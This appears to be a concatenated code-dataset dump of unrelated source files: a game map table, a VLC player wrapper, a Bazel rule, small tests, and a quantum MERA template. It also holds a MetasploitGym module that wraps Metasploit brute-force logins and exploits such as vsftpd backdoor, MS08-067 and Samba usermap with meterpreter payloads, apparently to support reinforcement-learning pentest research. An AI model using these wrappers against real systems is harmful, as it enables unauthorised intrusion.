663: [662, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 212 to Map 204"],
664: [665, 0, 0, 429, 430, "", b"", False, True, False, "Pyramid: Map 212 to Map 213"],
665: [664, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 213 to Map 212"],
666: [667, 0, 0, 430, 446, "", b"", False, True, False, "Pyramid: Map 213 to Map 218"],
667: [666, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 218 to Map 213"],
668: [669, 0, 0, 413, 424, "", b"", False, True, False, "Pyramid: Map 204 to Map 210"], # Room 6
669: [668, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 210 to Map 204"],
670: [671, 0, 0, 424, 425, "", b"", False, True, False, "Pyramid: Map 210 to Map 211"],
671: [670, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 211 to Map 210"],
672: [673, 0, 0, 425, 447, "", b"", False, True, False, "Pyramid: Map 211 to Map 218"],
673: [672, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 218 to Map 211"],
# Babel
682: [683, 0, 0, 460, 461, "", b"", False, True, False, "Babel: Map 222 to Map 223"],
683: [682, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 223 to Map 222"],
684: [685, 0, 0, 462, 463, "", b"", False, True, False, "Babel: Map 223 to Map 224"],
685: [684, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 224 to Map 223"],
686: [687, 0, 0, 463, 474, "", b"", False, True, False, "Babel: Map 224 to Map 242"], # Castoth
687: [686, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 242 to Map 224"],
688: [689, 0, 0, 463, 475, "", b"", False, True, False, "Babel: Map 224 to Map 243"], # Viper
689: [688, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 243 to Map 224"],
690: [691, 0, 0, 463, 465, "", b"", False, True, False, "Babel: Map 224 to Map 225 (bottom)"],
691: [690, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 225 to Map 224 (bottom)"],
692: [693, 0, 0, 466, 464, "", b"", False, True, False, "Babel: Map 225 to Map 224 (top)"],
693: [692, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 224 to Map 225 (top)"],
694: [695, 0, 0, 464, 476, "", b"", False, True, False, "Babel: Map 224 to Map 244"], # Vampires
695: [694, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 244 to Map 224"],
696: [697, 0, 0, 464, 477, "", b"", False, True, False, "Babel: Map 224 to Map 245"], # Sand Fanger
697: [696, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 245 to Map 224"],
698: [699, 0, 0, 464, 469, "", b"", False, True, False, "Babel: Map 224 to Map 226"],
699: [698, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 226 to Map 224"],
#700: [701, 0, 0, 470, 471, "", b"", False, True, False, "Babel: Map 226 to Map 227"], #DUPLICATE W/BOSS EXITS
#701: [700, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 227 to Map 226"],
702: [703, 0, 0, 471, 478, "", b"", False, True, False, "Babel: Map 227 to Map 246"], # Mummy Queen
703: [702, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 246 to Map 227"],
704: [705, 0, 0, 471, 467, "", b"", False, True, False, "Babel: Map 227 to Map 225 (bottom)"],
705: [704, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 225 to Map 227 (bottom)"],
706: [707, 0, 0, 468, 472, "", b"", False, True, False, "Babel: Map 225 to Map 227 (top)"],
707: [706, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 227 to Map 225 (top)"],
708: [709, 0, 0, 472, 473, "", b"", False, True, False, "Babel: Map 227 to Map 222"],
709: [708, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 222 to Map 227"],
# Jeweler's Mansion
720: [721, 0, 0, 8, 480, "8d32a", b"", False, True, True, "Mansion entrance"],
721: [720, 0, 0, 480, 400, "8fcb4", b"", False, True, True, "Mansion exit"]
}
| 59.960007 | 236 | 0.462324 | 324,753 | 0.998187 | 0 | 0 | 0 | 0 | 0 | 0 | 107,161 | 0.329379 |
2cc43eb4f9599bc9a7ccc0a29be8b90564b75a49 | 8,938 | py | Python | src/MediaPlayer/Player/VLCPlayer.py | JKorf/MediaPi | 4b21bb9cfa692534d0098ad947dd99beb7b0c1ed | [
"MIT"
] | 2 | 2018-02-26T15:57:04.000Z | 2019-03-11T15:21:38.000Z | src/MediaPlayer/Player/VLCPlayer.py | JKorf/MediaPi | 4b21bb9cfa692534d0098ad947dd99beb7b0c1ed | [
"MIT"
] | 1 | 2018-07-25T16:36:11.000Z | 2018-07-25T16:36:11.000Z | src/MediaPlayer/Player/VLCPlayer.py | JKorf/MediaPi | 4b21bb9cfa692534d0098ad947dd99beb7b0c1ed | [
"MIT"
] | null | null | null | import datetime
import os
import time
from enum import Enum
import sys
from MediaPlayer.Player import vlc
from MediaPlayer.Player.vlc import libvlc_get_version, Media, MediaList
from Shared.Events import EventManager, EventType
from Shared.Logger import Logger, LogVerbosity
from Shared.Observable import Observable
from Shared.Settings import Settings
from Shared.Threading import CustomThread
from Shared.Util import Singleton
class VLCPlayer(metaclass=Singleton):
def __init__(self):
self.__vlc_instance = None
self.player_state = PlayerData()
self.instantiate_vlc()
self.media = None
self.__player = self.__vlc_instance.media_player_new()
self.__list_player = self.__vlc_instance.media_list_player_new()
self.__list_player.set_media_player(self.__player)
self.__event_manager = self.__player.event_manager()
self.set_volume(75)
EventManager.register_event(EventType.SetSubtitleFiles, self.set_subtitle_files)
EventManager.register_event(EventType.StopPlayer, self.stop)
self.player_observer = CustomThread(self.observe_player, "Player observer")
self.player_observer.start()
self.stop_player_thread = None
def instantiate_vlc(self):
parameters = self.get_instance_parameters()
Logger().write(LogVerbosity.Debug, "VLC parameters: " + str(parameters))
self.__vlc_instance = vlc.Instance("cvlc", *parameters)
Logger().write(LogVerbosity.Info, "VLC version " + libvlc_get_version().decode('utf8'))
def play(self, url, time=0):
parameters = self.get_play_parameters(url, time)
Logger().write(LogVerbosity.Info, "VLC Play | Url: " + url)
Logger().write(LogVerbosity.Info, "VLC Play | Time: " + str(time))
Logger().write(LogVerbosity.Info, "VLC Play | Parameters: " + str(parameters))
self.player_state.start_update()
self.player_state.path = url
self.player_state.stop_update()
self.media = Media(url, *parameters)
if 'youtube' in url:
media_list = MediaList()
media_list.add_media(self.media)
self.__list_player.set_media_list(media_list)
self.__list_player.play()
else:
self.__player.set_media(self.media)
self.__player.play()
@staticmethod
def get_instance_parameters():
params = ["--verbose=" + str(Settings.get_int("vlc_log_level")),
"--network-caching=" + str(Settings.get_int("network_caching")),
"--ipv4-timeout=500",
"--image-duration=-1"]
if sys.platform == "linux" or sys.platform == "linux2":
log_path = Settings.get_string("base_folder") + "/Logs/" + datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S')
params.append("--logfile=" + log_path + '/vlc_' + datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S') + ".txt")
params.append("--file-logging")
params.append("--file-caching=5000")
return params
def get_play_parameters(self, url, time):
params = []
if time != 0:
params.append("start-time=" + str(time // 1000))
return params
def set_window(self, handle):
if sys.platform == "linux" or sys.platform == "linux2":
self.__player.set_xwindow(handle)
else:
self.__player.set_hwnd(handle)
def pause_resume(self):
Logger().write(LogVerbosity.All, "Player pause resume")
self.__player.pause()
def stop(self):
Logger().write(LogVerbosity.All, "Player stop")
thread = CustomThread(lambda: self.__player.stop(), "Stopping VLC player")
thread.start()
def set_volume(self, vol):
Logger().write(LogVerbosity.Debug, "Player set volume " + str(vol))
self.__player.audio_set_volume(vol)
self.player_state.start_update()
self.player_state.volume = vol
self.player_state.stop_update()
def get_volume(self):
return self.__player.audio_get_volume()
def get_position(self):
return self.__player.get_time()
def get_length(self):
return int(self.__player.get_length())
def set_time(self, pos):
Logger().write(LogVerbosity.Debug, "Player set time " + str(pos))
self.__player.set_time(pos)
self.player_state.start_update()
self.player_state.playing_for = pos
self.player_state.stop_update()
def set_position(self, pos):
Logger().write(LogVerbosity.Debug, "Player set position " + str(pos))
self.__player.set_position(pos)
def set_subtitle_delay(self, delay):
Logger().write(LogVerbosity.Debug, "Player set subtitle delay " + str(delay))
self.__player.video_set_spu_delay(delay)
self.player_state.start_update()
self.player_state.sub_delay = delay
self.player_state.stop_update()
def get_state(self):
return self.__player.get_state()
def get_audio_track(self):
return self.__player.audio_get_track()
def set_audio_track(self, track_id):
Logger().write(LogVerbosity.Debug, "Player set audio track " + str(track_id))
self.__player.audio_set_track(track_id)
self.player_state.start_update()
self.player_state.audio_track = track_id
self.player_state.stop_update()
def get_audio_tracks(self):
tracks = self.__player.audio_get_track_description()
result = []
for trackid, trackname in tracks:
result.append((trackid, trackname.decode('utf8')))
return result
def set_subtitle_files(self, files):
Logger().write(LogVerbosity.Debug, "Adding " + str(len(files)) + " subtitle files")
pi = sys.platform == "linux" or sys.platform == "linux2"
for file in reversed(files):
if not pi and file[1] != ":":
file = "C:" + file
file = file.replace("/", os.sep).replace("\\", os.sep)
# NOTE this must be called after Play()
self.__player.video_set_subtitle_file(file)
def set_subtitle_track(self, id):
Logger().write(LogVerbosity.Debug, "Player set subtitle track " + str(id))
self.__player.video_set_spu(id)
self.player_state.start_update()
self.player_state.sub_track = id
self.player_state.stop_update()
def get_subtitle_count(self):
return self.__player.video_get_spu_count()
def get_subtitle_tracks(self):
tracks = self.__player.video_get_spu_description()
result = []
for trackid, trackname in tracks:
result.append((trackid, trackname.decode('utf-8')))
return result
def get_subtitle_delay(self):
return self.__player.video_get_spu_delay()
def get_selected_sub(self):
return self.__player.video_get_spu()
def try_play_subitem(self):
media = self.__player.get_media()
if media is None:
self.stop()
return
subs = media.subitems()
if subs is None:
self.stop()
return
if len(subs) == 1:
subs[0].add_options("demux=avformat")
self.__player.set_media(subs[0])
self.__player.play()
def observe_player(self):
while True:
state = self.get_state().value
if state in [5, 6, 7]:
state = 0
new_state = PlayerState(state)
if new_state == PlayerState.Nothing and self.player_state.state != PlayerState.Nothing:
self.stop_player_thread = CustomThread(self.stop, "Stopping player")
self.stop_player_thread.start()
self.player_state.start_update()
self.player_state.state = new_state
self.player_state.playing_for = self.get_position()
self.player_state.length = self.get_length()
self.player_state.audio_tracks = self.get_audio_tracks()
self.player_state.audio_track = self.get_audio_track()
self.player_state.sub_delay = self.get_subtitle_delay()
self.player_state.sub_track = self.get_selected_sub()
self.player_state.sub_tracks = self.get_subtitle_tracks()
self.player_state.volume = self.get_volume()
self.player_state.stop_update()
time.sleep(0.5)
class PlayerState(Enum):
Nothing = 0
Opening = 1
Buffering = 2
Playing = 3
Paused = 4
class PlayerData(Observable):
def __init__(self):
super().__init__("PlayerData", 0.5)
self.path = None
self.state = PlayerState.Nothing
self.playing_for = 0
self.length = 0
self.volume = 0
self.sub_delay = 0
self.sub_track = 0
self.sub_tracks = []
self.audio_track = 0
self.audio_tracks = []
| 34.376923 | 125 | 0.634818 | 8,497 | 0.95066 | 0 | 0 | 717 | 0.080219 | 0 | 0 | 749 | 0.0838 |
2cc4536cac3f4a836b4d31edbb9c035b10194cbe | 937 | bzl | Python | build/buildflag_header.bzl | Lynskylate/chromium-base-bazel | e68247d002809f0359e28ee7fc6c5c33de93ce9d | [
"BSD-3-Clause"
] | null | null | null | build/buildflag_header.bzl | Lynskylate/chromium-base-bazel | e68247d002809f0359e28ee7fc6c5c33de93ce9d | [
"BSD-3-Clause"
] | null | null | null | build/buildflag_header.bzl | Lynskylate/chromium-base-bazel | e68247d002809f0359e28ee7fc6c5c33de93ce9d | [
"BSD-3-Clause"
] | 1 | 2020-04-30T08:12:46.000Z | 2020-04-30T08:12:46.000Z | # Primitive reimplementation of the buildflag_header scripts used in the gn build
def _buildflag_header_impl(ctx):
content = "// Generated by build/buildflag_header.bzl\n"
content += '// From "' + ctx.attr.name + '"\n'
content += "\n#ifndef %s_h\n" % ctx.attr.name
content += "#define %s_h\n\n" % ctx.attr.name
content += '#include "build/buildflag.h"\n\n'
for key in ctx.attr.flags:
content += "#define BUILDFLAG_INTERNAL_%s() (%s)\n" % (key, ctx.attr.flags[key])
content += "\n#endif // %s_h\n" % ctx.attr.name
ctx.actions.write(output = ctx.outputs.header, content = content)
buildflag_header = rule(
implementation = _buildflag_header_impl,
attrs = {
"flags": attr.string_dict(mandatory = True),
"header": attr.string(mandatory = True),
"header_dir": attr.string(),
},
outputs = {"header": "%{header_dir}%{header}"},
output_to_genfiles = True,
)
| 39.041667 | 88 | 0.638207 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 333 | 0.35539 |
2cc49cc05dd233210db2a108c300fb21af3b9cd7 | 737 | py | Python | test/test_led_matrix.py | soundmaking/led8x8m | 383fe39c9e328951a25fd23298a4a4c11e8c964e | [
"MIT"
] | null | null | null | test/test_led_matrix.py | soundmaking/led8x8m | 383fe39c9e328951a25fd23298a4a4c11e8c964e | [
"MIT"
] | null | null | null | test/test_led_matrix.py | soundmaking/led8x8m | 383fe39c9e328951a25fd23298a4a4c11e8c964e | [
"MIT"
] | null | null | null | import unittest
from led8x8m import LedMatrix
class TestLedMatrix(unittest.TestCase):
def test_pin_numbers(self):
self.assertEqual(len(LedMatrix.PIN_X), 8)
self.assertEqual(len(LedMatrix.PIN_Y), 8)
set_x = set(LedMatrix.PIN_X)
set_y = set(LedMatrix.PIN_Y)
self.assertEqual(len(set_x), 8)
self.assertEqual(len(set_y), 8)
self.assertTrue(set_x.isdisjoint(set_y))
def test_matrix_buffer(self):
self.assertIsInstance(LedMatrix.matrix_buffer, list)
self.assertEqual(len(LedMatrix.matrix_buffer), 8)
for n in range(8):
self.assertIsInstance(LedMatrix.matrix_buffer[n], list)
self.assertEqual(len(LedMatrix.matrix_buffer[n]), 8)
| 35.095238 | 67 | 0.68114 | 688 | 0.933514 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
2cc64e7427ad44d75120cd7e72ff13af6fe08245 | 1,240 | py | Python | Algorithms/0538_Convert_BST_to_Greater_Tree/Python/Convert_BST_to_Greater_Tree_Solution_1.py | lht19900714/Leetcode_Python | 645211f0ec71de579f1b091453db9eea80de9816 | [
"MIT"
] | null | null | null | Algorithms/0538_Convert_BST_to_Greater_Tree/Python/Convert_BST_to_Greater_Tree_Solution_1.py | lht19900714/Leetcode_Python | 645211f0ec71de579f1b091453db9eea80de9816 | [
"MIT"
] | null | null | null | Algorithms/0538_Convert_BST_to_Greater_Tree/Python/Convert_BST_to_Greater_Tree_Solution_1.py | lht19900714/Leetcode_Python | 645211f0ec71de579f1b091453db9eea80de9816 | [
"MIT"
] | null | null | null |
# Space: O(n)
# Time: O(n)
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def convertBST(self, root):
if (root is None) or (root.left is None and root.right is None): return root
def inorder_traversal(root):
if root is None: return []
res = []
left = inorder_traversal(root.left)
res.append(root.val)
right = inorder_traversal(root.right)
return left + res + right
def update_BST(adict, root):
queue = [root]
while queue:
cur = queue.pop(0)
# print(cur.val)
cur.val = adict[cur.val]
if cur.left:
queue.append(cur.left)
if cur.right:
queue.append(cur.right)
return root
inorder_traversal_res = inorder_traversal(root)
cache = {}
for i in range(len(inorder_traversal_res)):
cache[inorder_traversal_res[i]] = sum(inorder_traversal_res[i:])
return update_BST(cache, root)
| 26.956522 | 84 | 0.533065 | 1,013 | 0.816935 | 0 | 0 | 0 | 0 | 0 | 0 | 227 | 0.183065 |
2cc678dfef8cb0874fecfe2385fa62869906f077 | 14,652 | py | Python | metasploit_gym/action/exploit.py | phreakAI/MetasploitGym | 128b977ccebbbb026784cba0ecd82182fdfb0cdb | [
"MIT"
] | 6 | 2021-10-01T20:05:24.000Z | 2022-03-24T20:14:41.000Z | metasploit_gym/action/exploit.py | phreakAI/MetasploitGym | 128b977ccebbbb026784cba0ecd82182fdfb0cdb | [
"MIT"
] | 1 | 2021-12-13T09:24:56.000Z | 2022-03-27T02:08:14.000Z | metasploit_gym/action/exploit.py | phreakAI/MetasploitGym | 128b977ccebbbb026784cba0ecd82182fdfb0cdb | [
"MIT"
] | null | null | null | """Exploits currently supported
Straightforward to add more following the basic model presented here
"""
from .action import Exploit
import time
def wait_for_job_completion(job_info, client):
if job_info is not None:
if "error" in job_info:
return
job_is_running = True
while job_is_running:
job_id = job_info["uuid"]
results = client.jobs.info_by_uuid(job_id)
if "error" in results:
return
if results["status"] == "completed":
job_is_running = False
else:
time.sleep(1)
class SSH_Bruteforce(Exploit):
"""port 22 bruteforce
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssh/ssh_login.rb
"""
def __init__(self, target=(0, 0)):
self.name = "SSH_Bruteforce"
self.service = "ssh"
self.target = target
self.req_access = None
self.req_os = None
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=22):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 22
:return:
"""
exploit = client.modules.use("auxiliary", "scanner/ssh/ssh_login")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
# TODO: This should be detected based on metasploit rpc server
exploit["USERPASS_FILE"] = "/usr/share/metasploit-framework/data/wordlists"
job_info = exploit.execute()
wait_for_job_completion(job_info, client)
class FTP_Bruteforce(Exploit):
"""port 23 bruteforce
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/ftp_login.rb
"""
def __init__(self, target=(0, 0)):
self.name = "FTP_Bruteforce"
self.service = "ftp"
self.target = target
self.req_access = None
self.req_os = None
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=23):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 23
:return:
"""
exploit = client.modules.use("auxiliary", "scanner/ftp/ftp_login")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
# TODO: This should be detected based on metasploit rpc server
exploit["USERPASS_FILE"] = "/usr/share/metasploit-framework/data/wordlists"
job_info = exploit.execute()
wait_for_job_completion(job_info, client)
class SMB_Bruteforce(Exploit):
"""
port 445 bruteforce
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_login.rb
"""
def __init__(self, target=(0, 0)):
self.name = "SMB_Bruteforce"
self.service = "Microsoft-DS"
self.target = target
self.req_access = None
self.req_os = None
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=445):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 445
:return:
"""
exploit = client.modules.use("auxiliary", "scanner/smb/smb_login")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
exploit[
"USERPASS_FILE"
] = "/usr/share/metasploit-framework/data/wordlists" # TODO: This should be detected based on metasploit rpc server
job_info = exploit.execute()
wait_for_job_completion(job_info, client)
class Telnet_Bruteforce(Exploit):
"""port 23 bruteforce
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/telnet/telnet_login.rb
"""
def __init__(self, target=(0, 0)):
self.name = "Telnet_Bruteforce"
self.service = "telnet"
self.target = target
self.req_access = None
self.req_os = None
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=445):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 445
:return:
"""
exploit = client.modules.use("auxiliary", "scanner/telnet/telnet_login")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
exploit[
"USERPASS_FILE"
] = "/usr/share/metasploit-framework/data/wordlists" # TODO: This should be detected based on metasploit rpc server
job_info = exploit.execute()
wait_for_job_completion(job_info, client)
class VSFTPD(Exploit):
"""use exploit/unix/ftp/vsftpd_234_backdoor
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
Args:
Exploit ([type]): vsftpd 2.3.4 port 21
Raises:
NotImplementedError: [description]
"""
def __init__(self, target=(0, 0)):
self.name = "VSFTPD"
self.service = "ftp"
self.target = target
self.req_access = None
self.req_os = "unix"
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=21):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 21
:return:
"""
exploit = client.modules.use("exploit", "unix/ftp/vsftpd_234_backdoor")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
job_info = exploit.execute(payload="cmd/unix/interact")
wait_for_job_completion(job_info, client)
class JavaRMIServer(Exploit):
"""[summary]
https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/modules/exploits/multi/misc/java_rmi_server.rb
Args:
Exploit ([type]): [description]
"""
def __init__(self, target=(0, 0)):
self.name = "Java_RMI_Server"
self.service = "http"
self.target = target
self.req_access = None
self.req_os = None
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=1099):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 21
:return:
"""
exploit = client.modules.use("exploit", "multi/misc/java_rmi_server")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
exploit.execute(cmd="java/meterpreter/reverse_https")
class Ms08_067_Netapi(Exploit):
"""https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms08_067_netapi.rb
Classic smb exploitation through crafted rpc packet. Works great on windows xp.
Args:
Exploit ([type]): [description]
"""
def __init__(self, target=(0, 0)):
self.name = "ms08_067_netapi"
self.service = "Microsoft-DS"
self.target = target
self.req_access = None
self.req_os = "win"
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=445):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 21
:return:
"""
exploit = client.modules.use("exploit", "windows/smb/ms08_067_netapi")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
job_info = exploit.execute(cmd="windows/meterpreter/reverse_https")
wait_for_job_completion(job_info, client)
class ManageEngine_Auth_Upload(Exploit):
"""https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/manageengine_auth_upload.rb
Http upload that allows remote code execution on ManageEngine ServiceDesk
TODO: Find a vulnerable copy of this for building environments. oy vey.
Args:
Exploit ([type]): [description]
"""
def __init__(self, target=(0, 0)):
self.name = "ManageEngine_Auth_Upload"
self.service = "http"
self.target = target
self.req_access = None
self.req_os = None
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=8080):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 21
:return:
"""
exploit = client.modules.use("exploit", "multi/http/manageengine_auth_upload")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
job_info = exploit.execute(cmd="java/meterpreter/reverse_https")
wait_for_job_completion(job_info, client)
class ApacheJamesExecution(Exploit):
"""https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/smtp/apache_james_exec.rb
'Name' => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write"
Args:
Exploit ([type]): [description]
"""
def __init__(self, target=(0, 0)):
self.name = "Apache_James_InsecureUserCreation"
self.service = "smpt"
self.target = target
self.req_access = None
self.req_os = "linux"
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=8080):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 21
:return:
"""
exploit = client.modules.use("exploit", "multi/http/manageengine_auth_upload")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
job_info = exploit.execute(cmd="java/meterpreter/reverse_https")
wait_for_job_completion(job_info, client)
class SambaUsermapScript(Exploit):
"""https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/samba/usermap_script.rb
'Name' => "Samba "username map script" Command Execution"
Args:
Exploit ([type]): [description]
"""
def __init__(self, target=(0, 0)):
self.name = "Samba_Usermap_Script"
self.target = target
self.service = "NetBIOS-SSN"
self.req_access = None
self.req_os = "multi"
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=139):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 139
:return:
"""
exploit = client.modules.use("exploit", "multi/samba/usermap_script")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
job_info = exploit.execute(cmd="java/meterpreter/reverse_https")
wait_for_job_completion(job_info, client)
class ApacheTomcatAuthenticationCodeExecution(Exploit):
"""https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/tomcat_mgr_deploy.rb
'Name' => "Apache Tomcat Manager Application Deployer Authenticated Code Execution"
Args:
Exploit ([type]): [description]
"""
def __init__(self, target=(0, 0)):
self.name = "Apache_Tomcat_Execution"
self.target = target
self.service = "http"
self.req_access = None
self.req_os = "multi"
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=8080):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port None
:return:
"""
exploit = client.modules.use("exploit", "multi/http/tomcat_mgr_deploy")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
job_info = exploit.execute(cmd="java/meterpreter/reverse_https")
wait_for_job_completion(job_info, client)
class Jenkins_CI_Script_Java_Execution(Exploit):
"""https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/jenkins_script_console.rb
'Name' => "Jenkins-CI Script-Console Java Execution"
Args:
Exploit ([type]): [description]
"""
def __init__(self, target=(0, 0)):
self.name = "Jenkins_CI_Script_Console_Java_Execution"
self.service = "http"
self.target = target
self.req_access = None
self.req_os = "multi"
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=8080):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 8080
:return:
"""
exploit = client.modules.use("exploit", "multi/http/jenkins_script_console")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
job_info = exploit.execute(cmd="java/meterpreter/reverse_https")
wait_for_job_completion(job_info, client)
| 34.556604 | 143 | 0.628651 | 13,992 | 0.954955 | 0 | 0 | 0 | 0 | 0 | 0 | 6,705 | 0.457617 |
2cc7f3efda8117742ff48850a1183416a5ff0254 | 10,178 | py | Python | pennylane/templates/tensornetworks/mera.py | therooler/pennylane | 88a8a5960a2ffd218a12f85ace632021eef2abf5 | [
"Apache-2.0"
] | null | null | null | pennylane/templates/tensornetworks/mera.py | therooler/pennylane | 88a8a5960a2ffd218a12f85ace632021eef2abf5 | [
"Apache-2.0"
] | null | null | null | pennylane/templates/tensornetworks/mera.py | therooler/pennylane | 88a8a5960a2ffd218a12f85ace632021eef2abf5 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018-2021 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Contains the MERA template.
"""
# pylint: disable-msg=too-many-branches,too-many-arguments,protected-access
import warnings
import pennylane as qml
import pennylane.numpy as np
from pennylane.operation import Operation, AnyWires
def compute_indices(wires, n_block_wires):
"""Generate a list containing the wires for each block.
Args:
wires (Iterable): wires that the template acts on
n_block_wires (int): number of wires per block
Returns:
layers (array): array of wire labels for each block
"""
n_wires = len(wires)
if n_block_wires % 2 != 0:
raise ValueError(f"n_block_wires must be an even integer; got {n_block_wires}")
if n_block_wires < 2:
raise ValueError(
f"number of wires in each block must be larger than or equal to 2; got n_block_wires = {n_block_wires}"
)
if n_block_wires > n_wires:
raise ValueError(
f"n_block_wires must be smaller than or equal to the number of wires; "
f"got n_block_wires = {n_block_wires} and number of wires = {n_wires}"
)
if not np.log2(n_wires / n_block_wires).is_integer():
warnings.warn(
f"The number of wires should be n_block_wires times 2^n; got n_wires/n_block_wires = {n_wires/n_block_wires}"
)
# number of layers in MERA
n_layers = np.floor(np.log2(n_wires / n_block_wires)).astype(int) * 2 + 1
wires_list = []
wires_list.append(list(wires[0:n_block_wires]))
highest_index = n_block_wires
# compute block indices for all layers
for i in range(n_layers - 1):
# number of blocks in previous layer
n_elements_pre = 2 ** ((i + 1) // 2)
if i % 2 == 0:
# layer with new wires
new_list = []
list_len = len(wires_list)
for j in range(list_len - n_elements_pre, list_len):
new_wires = [
wires[k] for k in range(highest_index, highest_index + n_block_wires // 2)
]
highest_index += n_block_wires // 2
new_list.append(wires_list[j][0 : n_block_wires // 2] + new_wires)
new_wires = [
wires[k] for k in range(highest_index, highest_index + n_block_wires // 2)
]
highest_index += n_block_wires // 2
new_list.append(new_wires + wires_list[j][n_block_wires // 2 : :])
wires_list = wires_list + new_list
else:
# layer only using previous wires
list_len = len(wires_list)
new_list = []
for j in range(list_len - n_elements_pre, list_len - 1):
new_list.append(
wires_list[j][n_block_wires // 2 : :]
+ wires_list[j + 1][0 : n_block_wires // 2]
)
new_list.append(
wires_list[j + 1][n_block_wires // 2 : :]
+ wires_list[list_len - n_elements_pre][0 : n_block_wires // 2]
)
wires_list = wires_list + new_list
return wires_list[::-1]
class MERA(Operation):
"""The MERA template broadcasts an input circuit across many wires following the
architecture of a multi-scale entanglement renormalization ansatz tensor network.
